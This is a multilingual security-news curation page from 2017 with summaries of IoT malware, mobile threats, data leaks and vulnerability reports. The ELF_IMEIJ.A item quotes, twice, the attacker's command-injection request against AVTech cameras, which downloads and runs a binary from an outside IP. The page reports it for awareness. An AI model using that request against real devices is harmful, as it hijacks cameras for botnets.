ICT Security-Sécurité PC et Internet
114.0K views | +25 today
ICT Security-Sécurité PC et Internet
ICT Security + Privacy + Piracy + Data Protection - Censorship - Des cours et infos gratuites sur la"Sécurité PC et Internet" pour usage non-commercial... (FR, EN+DE)...
Curated by Gust MEES
Your new post is loading...
Your new post is loading...
Scooped by Gust MEES
March 22, 2017 5:25 AM
Scoop.it!

Check: Besitzt Ihr Android-Smartphone die neuesten Sicherheits-Updates | #MobileSecurity #CyberSecurity 

Check: Besitzt Ihr Android-Smartphone die neuesten Sicherheits-Updates | #MobileSecurity #CyberSecurity  | ICT Security-Sécurité PC et Internet | Scoop.it
Längst nicht alle Android-Smartphones erhalten monatlich Sicherheits-Updates. Ob Ihr Smartphone dabei ist erfahren Sie hier.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Android

 

Gust MEES's insight:
Längst nicht alle Android-Smartphones erhalten monatlich Sicherheits-Updates. Ob Ihr Smartphone dabei ist erfahren Sie hier.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Android

 

No comment yet.
Scooped by Gust MEES
March 21, 2017 7:33 AM
Scoop.it!

Old Linux kernel security bug bites | #CyberSecurity #Awareness #NobodyIsPerfect

Old Linux kernel security bug bites | #CyberSecurity #Awareness #NobodyIsPerfect | ICT Security-Sécurité PC et Internet | Scoop.it
A Linux developer discovered a serious security hole that's been hiding for years in an out-of-date driver.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

Gust MEES's insight:
A Linux developer discovered a serious security hole that's been hiding for years in an out-of-date driver.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

No comment yet.
Scooped by Gust MEES
March 14, 2017 1:24 PM
Scoop.it!

Trend Micro details new IoT DDoS threat | #CyberSecurity #Awareness #Linux #Cameras

Trend Micro details new IoT DDoS threat | #CyberSecurity #Awareness #Linux #Cameras | ICT Security-Sécurité PC et Internet | Scoop.it
Trend Micro is reporting a new threat to Linux-based Internet of Things (IoT) devices that is specifically able to exploit a specific vulnerability in surveillance cameras made by AVTech.
The threat is called ELF_IMEIJ.A and was originally uncovered by Search-Lab in October 2016 and reported to AVTech. Trend Micro said Search-Labs did not received a response regarding the issue.

 

Much like Mirai, ELF_IMEIJ.A the malware searches for unprotected IoT devices, in this case a camera.
The attacker uses cgi-bin scripts to randomly ping IP addresses searching for a device that is vulnerable.


“Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally,” Trend wrote.


Search-Labs noted that every user password for the AVTech products is stored in clear text and that an attacker with access to the device itself can easily obtain the full list of passwords.
“By exploiting command injection or authentication bypass issues, the clear text admin password can be retrieved,” Search-Labs initial report on the malware stated.

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

Gust MEES's insight:
Trend Micro is reporting a new threat to Linux-based Internet of Things (IoT) devices that is specifically able to exploit a specific vulnerability in surveillance cameras made by AVTech.
The threat is called ELF_IMEIJ.A and was originally uncovered by Search-Lab in October 2016 and reported to AVTech. Trend Micro said Search-Labs did not received a response regarding the issue.

 

Much like Mirai, ELF_IMEIJ.A the malware searches for unprotected IoT devices, in this case a camera.
The attacker uses cgi-bin scripts to randomly ping IP addresses searching for a device that is vulnerable.


“Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally,” Trend wrote.


Search-Labs noted that every user password for the AVTech products is stored in clear text and that an attacker with access to the device itself can easily obtain the full list of passwords.
“By exploiting command injection or authentication bypass issues, the clear text admin password can be retrieved,” Search-Labs initial report on the malware stated.

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

No comment yet.
Scooped by Gust MEES
March 14, 2017 12:48 PM
Scoop.it!

The internet of botnets and ransomware on your TV: Here come your next big security headaches | #CyberSecurity

The internet of botnets and ransomware on your TV: Here come your next big security headaches | #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
National Cyber Security Centre and National Crime Agency warn more must be done to secure critical service from threat of IoT hacks.

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

Gust MEES's insight:
National Cyber Security Centre and National Crime Agency warn more must be done to secure critical service from threat of IoT hacks.

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

No comment yet.
Scooped by Gust MEES
March 12, 2017 12:59 PM
Scoop.it!

Android Adware and Ransomware Found Preinstalled on High-End Smartphones | #MobileSecurity#CyberSecurity

Android Adware and Ransomware Found Preinstalled on High-End Smartphones | #MobileSecurity#CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
Two companies have discovered that someone had covertly installed malware on 38 devices used by their employees. According to security firm Check Point, the installation of the malicious apps took place somewhere along the supply chain, after phones left the manufacturer's factory and before they arrived at the two companies.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Mobile-Security

 

Gust MEES's insight:
Two companies have discovered that someone had covertly installed malware on 38 devices used by their employees. According to security firm Check Point, the installation of the malicious apps took place somewhere along the supply chain, after phones left the manufacturer's factory and before they arrived at the two companies.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Mobile-Security

 

No comment yet.
Scooped by Gust MEES
March 8, 2017 11:16 AM
Scoop.it!

Mobile malware attacks hit new heights in 2016: Kaspersky Labs | #MobileSecurity #CyberSecurity #ICT

Mobile malware attacks hit new heights in 2016: Kaspersky Labs | #MobileSecurity #CyberSecurity #ICT | ICT Security-Sécurité PC et Internet | Scoop.it
The number of malicious installation packages found striking mobile devices more than tripled in 2016 resulting in almost 40 million attacks by malicious mobile malware, according to Kaspersky Labs.


Kaspersky's Mobile Malware Evolution 2016 report noted several trends that exploded last year, including the overall growth of mobile malware with 8.5 million malicious installation packages detected and the continued rapid development of mobile banking trojans with 128,886 being spotted. In addition, there were 261,214 non-banking mobile trojans found.
“As a comparison, from 2004 to 2013 we detected over 10,000,000 malicious installation packages; in 2014 the figure was nearly 2.5 million,” said Kaspersky Labs researcher Roman Unuchek, noting the number of attacks increased dramatically staring in late June – a trend that lasted through the end of the year.


One reason behind the large number of attacks is the fact that most smart phones and other mobile devices either receive no or late operating system updates leaving the device vulnerable to attack, particularly to the number one threat of 2016, advertising trojans that exploit super-user rights.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Mobile-Security

 

Gust MEES's insight:
The number of malicious installation packages found striking mobile devices more than tripled in 2016 resulting in almost 40 million attacks by malicious mobile malware, according to Kaspersky Labs.


Kaspersky's Mobile Malware Evolution 2016 report noted several trends that exploded last year, including the overall growth of mobile malware with 8.5 million malicious installation packages detected and the continued rapid development of mobile banking trojans with 128,886 being spotted. In addition, there were 261,214 non-banking mobile trojans found.
“As a comparison, from 2004 to 2013 we detected over 10,000,000 malicious installation packages; in 2014 the figure was nearly 2.5 million,” said Kaspersky Labs researcher Roman Unuchek, noting the number of attacks increased dramatically staring in late June – a trend that lasted through the end of the year.


One reason behind the large number of attacks is the fact that most smart phones and other mobile devices either receive no or late operating system updates leaving the device vulnerable to attack, particularly to the number one threat of 2016, advertising trojans that exploit super-user rights.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Mobile-Security

 

No comment yet.
Scooped by Gust MEES
March 8, 2017 9:46 AM
Scoop.it!

WikiLeaks drops huge cache of confidential CIA documents | #CyberSecurity #CyberEspionage #Hacking

WikiLeaks drops huge cache of confidential CIA documents | #CyberSecurity #CyberEspionage #Hacking | ICT Security-Sécurité PC et Internet | Scoop.it
Dump of apparently 'largely legitimate' 'Vault 7' documents include what appear to be details of CIA's hacking tools

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Cyberespionage

 

Gust MEES's insight:
Dump of apparently 'largely legitimate' 'Vault 7' documents include what appear to be details of CIA's hacking tools

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Cyberespionage

 

No comment yet.
Scooped by Gust MEES
March 3, 2017 2:55 PM
Scoop.it!

Per WhatsApp verschickte Fotos sind nicht so sicher wie ihr dachtet | #Encryption #Privacy

Per WhatsApp verschickte Fotos sind nicht so sicher wie ihr dachtet | #Encryption #Privacy | ICT Security-Sécurité PC et Internet | Scoop.it
WhatsApp wirbt mit vollständiger Verschlüsselung aller Nachrichten und ausgetauschten Bilder. Forscher haben jetzt allerdings herausgefunden: Die Verschlüsselung hat mitunter Schwachstellen, denn nach dem Empfang kann praktisch jeder Dateien auslesen.

Forscher vom Fraunhofer-Institut für Angewandte und Integrierte Sicherheit haben eine Lücke in der WhatsApp-Verschlüsselung entdeckt, die alle WhatsApp-Versionen auf Android-Geräten betrifft. Konkret geht es dabei um versendete Dateien wie Bilder, Sprachnachrichten und Dokumente. Sie werden nach dem Empfang unverschlüsselt auf dem Telefon gespeichert. Auch andere Apps haben damit Zugriff auf die empfangenen Daten.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=WhatsApp...

 

http://www.scoop.it/t/apps-for-any-use-mostly-for-education-and-free/?&tag=WhatsApp...

 

http://www.scoop.it/t/social-media-and-its-influence/?&tag=WhatsApp

 

No comment yet.
Scooped by Gust MEES
March 2, 2017 6:45 AM
Scoop.it!

9 Popular Password Manager Apps Found Leaking Your Secrets | #CyberSecurity #Passwords #Awareness #Android

9 Popular Password Manager Apps Found Leaking Your Secrets | #CyberSecurity #Passwords #Awareness #Android | ICT Security-Sécurité PC et Internet | Scoop.it

Top 9 Password Manager Apps for Android Found Leaking Your Secrets.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/ict-security-tools/?&tag=Password-Tools

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Password+Managers

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Android

 

Gust MEES's insight:

Top 9 Password Manager Apps for Android Found Leaking Your Secrets.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/ict-security-tools/?&tag=Password-Tools

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Password+Managers

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Android

 

Oskar Almazan's curator insight, March 2, 2017 9:12 AM
Making sure your passwords are secure is one of the first line of defense – for your computer, email, and information – against hacking attempts, and Password Managers are the one recommended by many security experts to keep all your passwords secure in one place. Password Managers are software that creates complex passwords, stores them and organizes all your passwords for your computers, websites, applications and networks, as well as remember them on your behalf. But what if your Password Managers itself are vulnerable?
Scooped by Gust MEES
February 28, 2017 4:08 PM
Scoop.it!

Over 800,000 user account details stolen from vulnerable forums... | #CyberSecurity  #vBulletin 

Over 800,000 user account details stolen from vulnerable forums... | #CyberSecurity  #vBulletin  | ICT Security-Sécurité PC et Internet | Scoop.it

If you're a member of an online forum, there's a good chance that the site is running a piece of software called vBulletin. The relative ease wit...

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=DATA-BREACHES

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=forums

 

Gust MEES's insight:

If you're a member of an online forum, there's a good chance that the site is running a piece of software called vBulletin. The relative ease wit...

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=DATA-BREACHES

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=forums

 

No comment yet.
Scooped by Gust MEES
February 28, 2017 3:33 AM
Scoop.it!

500,000+ devices have dangerous apps installed | #MobileSecurity #CyberSecurity

500,000+ devices have dangerous apps installed | #MobileSecurity #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
Dead apps can be deadly

It’s not just apps live in app stores that represent a risk. Telemetry data collected by McAfee Labs shows that more than 500,000 devices still have dead apps installed and are actively used. With more than 2 million apps in each of the major app stores, malicious apps find ways through the store curators initial quality-control process.

In the past year, more than 4,000 apps were removed from Google Play, without notification to users. These users and the organisations they work for are still exposed to any vulnerabilities, privacy risks, or malware contained in these dead apps.

One recent example is a password stealer, distributed on Google Play as a variety of utilities and tools to acquire Instagram followers or analyse usage. The malware leads the user to a phishing website with a simple design that makes it difficult to distinguish between the legitimate and the fake, easily capturing users’ credentials.

 

Learn more / En savoir plus / Mehr erfahren:

 

https://gustmees.wordpress.com/2014/03/05/often-asked-questions-are-there-cyber-security-dangers-with-apps-and-whats-about-privacy/

 

http://www.scoop.it/t/apps-for-any-use-mostly-for-education-and-free/?tag=Mobile+Security

 

Gust MEES's insight:
Dead apps can be deadly

It’s not just apps live in app stores that represent a risk. Telemetry data collected by McAfee Labs shows that more than 500,000 devices still have dead apps installed and are actively used. With more than 2 million apps in each of the major app stores, malicious apps find ways through the store curators initial quality-control process.

In the past year, more than 4,000 apps were removed from Google Play, without notification to users. These users and the organisations they work for are still exposed to any vulnerabilities, privacy risks, or malware contained in these dead apps.

One recent example is a password stealer, distributed on Google Play as a variety of utilities and tools to acquire Instagram followers or analyse usage. The malware leads the user to a phishing website with a simple design that makes it difficult to distinguish between the legitimate and the fake, easily capturing users’ credentials.

 

Learn more / En savoir plus / Mehr erfahren:

 

https://gustmees.wordpress.com/2014/03/05/often-asked-questions-are-there-cyber-security-dangers-with-apps-and-whats-about-privacy/

 

http://www.scoop.it/t/apps-for-any-use-mostly-for-education-and-free/?tag=Mobile+Security

 

No comment yet.
Scooped by Gust MEES
February 24, 2017 6:19 AM
Scoop.it!

Cloudbleed: Geheime Inhalte von Millionen Webseiten durch Cloudflare öffentlich | #CyberSecurity

Cloudbleed: Geheime Inhalte von Millionen Webseiten durch Cloudflare öffentlich | #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
Durch Fehler in der Serversoftware von Cloudflare wurden monatelang sensible Informationen von Webseiten im Netz verteilt. Webseiten, die das CDN nutzen, schickten bei Anfragen den Speicherinhalt anderer Cloudflare-Seiten mit.

 

Gust MEES's insight:
Durch Fehler in der Serversoftware von Cloudflare wurden monatelang sensible Informationen von Webseiten im Netz verteilt. Webseiten, die das CDN nutzen, schickten bei Anfragen den Speicherinhalt anderer Cloudflare-Seiten mit.

 

No comment yet.
Scooped by Gust MEES
February 22, 2017 12:18 PM
Scoop.it!

Une variante du malware Mirai développée pour Windows | #CyberSecurity #Botnet #Awareness 

Une variante du malware Mirai développée pour Windows | #CyberSecurity #Botnet #Awareness  | ICT Security-Sécurité PC et Internet | Scoop.it
Mirai n’a pas dit son dernier mot. Les éditeurs d’antivirus Dr Web et Kaspersky communiquent ainsi sur une nouvelle version du fameux malware, visant cette fois-ci des machines sous Windows. Dr. Web a été le premier à tirer la sonnette d’alarme au début du mois de février, suivi de près par Kaspersky.

Baptisé trojan.mirai1 par Dr Web, ce malware infecte les machines sous Windows en utilisant des vecteurs classiques, type pièce jointe malveillante ou macro Office. Une fois la machine infectée par le trojan, celui-ci va scanner le réseau local à la recherche d’objets connectés fonctionnant sous Linux. Puis il va utiliser ceux-ci afin de les infecter avec une variante de Mirai, et ceux-ci seront ajoutés au botnet des cybercriminels qui peuvent alors les utiliser pour lancer des attaques DDoS.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet&tag=Mirai+Botnet

 

Gust MEES's insight:
Mirai n’a pas dit son dernier mot. Les éditeurs d’antivirus Dr Web et Kaspersky communiquent ainsi sur une nouvelle version du fameux malware, visant cette fois-ci des machines sous Windows. Dr. Web a été le premier à tirer la sonnette d’alarme au début du mois de février, suivi de près par Kaspersky.

Baptisé trojan.mirai1 par Dr Web, ce malware infecte les machines sous Windows en utilisant des vecteurs classiques, type pièce jointe malveillante ou macro Office. Une fois la machine infectée par le trojan, celui-ci va scanner le réseau local à la recherche d’objets connectés fonctionnant sous Linux. Puis il va utiliser ceux-ci afin de les infecter avec une variante de Mirai, et ceux-ci seront ajoutés au botnet des cybercriminels qui peuvent alors les utiliser pour lancer des attaques DDoS.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnet&tag=Mirai+Botnet

 

No comment yet.
Scooped by Gust MEES
March 22, 2017 3:30 AM
Scoop.it!

LastPass hit by password stealing and code execution vulnerabilities | #CyberSecurity #Awareness #ICT

LastPass hit by password stealing and code execution vulnerabilities | #CyberSecurity #Awareness #ICT | ICT Security-Sécurité PC et Internet | Scoop.it
LastPass has closed a remote code execution vulnerability on its Chrome extension, but according to Google Project Zero researcher Tavis Ormandy, issues remain on its Firefox extension, as well as details on another password-stealing vulnerability to come.

Writing in the Project Zero issue tracker, Ormandy said it was possible to proxy untrusted messages to LastPass.

"This allows complete access to internal privileged LastPass RPC commands," the researcher said. "There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc)."

MORE SECURITY NEWS

Secret Service laptop with Trump Tower plans stolen from car
Feature or flaw? How to hijack a Windows account in less than a minute
Internet of Things security: What happens when every device is smart and you don't even know it?
Microsoft Edge used to escape VMware Workstation at Pwn2Own 2017
Additionally, if a user has the LastPass binary component installed, the system was vulnerable to remote code execution.
No comment yet.
Scooped by Gust MEES
March 20, 2017 7:59 AM
Scoop.it!

Internet of Things security: What happens when every device is smart and you don't even know it? | #CyberSecurity

Internet of Things security: What happens when every device is smart and you don't even know it? | #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
When IoT devices are everywhere, the security headaches just get worse.

 

 

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

Gust MEES's insight:
When IoT devices are everywhere, the security headaches just get worse.

 

 

 

Learn more / En savoir plus / Mehr erfahren: 

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Mirai+Botnet

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=wearables

 

https://globaleducationandsocialmedia.wordpress.com/2014/01/21/why-is-it-a-must-to-have-basics-knowledge-of-cyber-security-in-a-connected-technology-world/

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=SHODAN+Search+Engine

 

http://www.scoop.it/t/21st-century-learning-and-teaching/?tag=Internet+of+Things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=smart-TV

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Internet+of+things

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=Cars

 

No comment yet.
Scooped by Gust MEES
March 14, 2017 12:57 PM
Scoop.it!

How to remove ransomware: Use this battle plan to fight back | #CyberSecurity #Awareness

How to remove ransomware: Use this battle plan to fight back | #CyberSecurity #Awareness | ICT Security-Sécurité PC et Internet | Scoop.it
Ransomware has exploded onto the PC. We'll show you what to do to avoid it, remove it, and—if necessary—even negotiate with its authors.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=RANSOMWARE

 

 

Gust MEES's insight:
Ransomware has exploded onto the PC. We'll show you what to do to avoid it, remove it, and—if necessary—even negotiate with its authors.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=RANSOMWARE

 

No comment yet.
Scooped by Gust MEES
March 14, 2017 12:32 PM
Scoop.it!

The 5 Minute Guide™ to Ransomware – Safe and Savvy Blog by F-Secure | #CyberSecurity #Awareness #CyberHygiene

The 5 Minute Guide™ to Ransomware – Safe and Savvy Blog by F-Secure | #CyberSecurity #Awareness #CyberHygiene | ICT Security-Sécurité PC et Internet | Scoop.it
Imagine losing all the photos, videos, messages, and documents you've stored on your computer. How much money would you be willing to pay to get it all back? Ransomware is malware that infects your computer, locks it, and demands payment for unlocking it.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=RANSOMWARE

 

Gust MEES's insight:
Imagine losing all the photos, videos, messages, and documents you've stored on your computer. How much money would you be willing to pay to get it all back? Ransomware is malware that infects your computer, locks it, and demands payment for unlocking it.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?tag=RANSOMWARE

 

No comment yet.
Scooped by Gust MEES
March 11, 2017 5:53 PM
Scoop.it!

New Linux malware hijacks one vendor's IoT devices by exploiting CGI bug | #CyberSecurity #InternetOfThings

New Linux malware hijacks one vendor's IoT devices by exploiting CGI bug | #CyberSecurity #InternetOfThings | ICT Security-Sécurité PC et Internet | Scoop.it
A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.

The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Why, you might ask?

ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.

Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.

The problem is that there is not whitelist-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

 

Gust MEES's insight:
A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.

The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Why, you might ask?

ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.

Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.

The problem is that there is not whitelist-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

No comment yet.
Scooped by Gust MEES
March 8, 2017 10:18 AM
Scoop.it!

Firefox 52 warns when you try to enter passwords on non-encrypted websites | #CyberSecurity #Awareness #Browser

Firefox 52 warns when you try to enter passwords on non-encrypted websites | #CyberSecurity #Awareness #Browser | ICT Security-Sécurité PC et Internet | Scoop.it
Mozilla patches 28 security vulnerabilities and protects users from entering their sensitive information on insecure webpages.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=ENCRYPTION

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Passwords

 

https://gustmees.wordpress.com/2012/05/02/get-smart-with-5-minutes-tutorialsit-securitypart-1-browsers/

 

Gust MEES's insight:
Mozilla patches 28 security vulnerabilities and protects users from entering their sensitive information on insecure webpages.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=ENCRYPTION

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Passwords

 

https://gustmees.wordpress.com/2012/05/02/get-smart-with-5-minutes-tutorialsit-securitypart-1-browsers/

 

No comment yet.
Scooped by Gust MEES
March 7, 2017 10:02 AM
Scoop.it!

WikiLeaks: CIA betreibt offenbar Hacker-Einheit in Frankfurt | #Germany #US #CyberEspionage #CyberSecurity

WikiLeaks: CIA betreibt offenbar Hacker-Einheit in Frankfurt | #Germany #US #CyberEspionage #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
Eine CIA-Einheit entwickelt in Frankfurt am Main maßgefertigte Computerviren. Das zeigen Dokumente, die die Plattform WikiLeaks veröffentlicht hat. Offenbar werden von dort aus Hackerangriffe in Europa, China und dem Nahen Osten geleitet. Von J. Goetz und J. Strozyk.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Cyberespionage

 

Gust MEES's insight:
Eine CIA-Einheit entwickelt in Frankfurt am Main maßgefertigte Computerviren. Das zeigen Dokumente, die die Plattform WikiLeaks veröffentlicht hat. Offenbar werden von dort aus Hackerangriffe in Europa, China und dem Nahen Osten geleitet. Von J. Goetz und J. Strozyk.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Cyberespionage

 

No comment yet.
Scooped by Gust MEES
March 2, 2017 9:46 AM
Scoop.it!

Hacking robots: Why it could be a lot easier than it should be | #CyberSecurity #IoT #IoE #InternetOfThings

Hacking robots: Why it could be a lot easier than it should be | #CyberSecurity #IoT #IoE #InternetOfThings | ICT Security-Sécurité PC et Internet | Scoop.it
Security researchers say they have found a number of security flaws across a range of robots.

 

In total, researchers said they had discovered almost 50 cybersecurity vulnerabilities across the SoftBank Robotics' NAO and Pepper robots, UBTECH Robotics' Alpha 1S and Alpha 2 robots, the ROBOTIS ROBOTIS OP2 and THORMANG3 robots, Universal Robots' UR3, UR5, UR10 robots, Rethink Robotics' Baxter and Sawyer robots and several robots using technology by Asratec Corp.

 

Researchers spent six months testing mobile applications, robot operating systems, firmware images, and other software in order to identify the flaws in the robots, which for the purposes of maintaining security haven't be specifically detailed in IOActive's newly released Hacking Robots Before Skynet report.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

Gust MEES's insight:
Security researchers say they have found a number of security flaws across a range of robots.

 

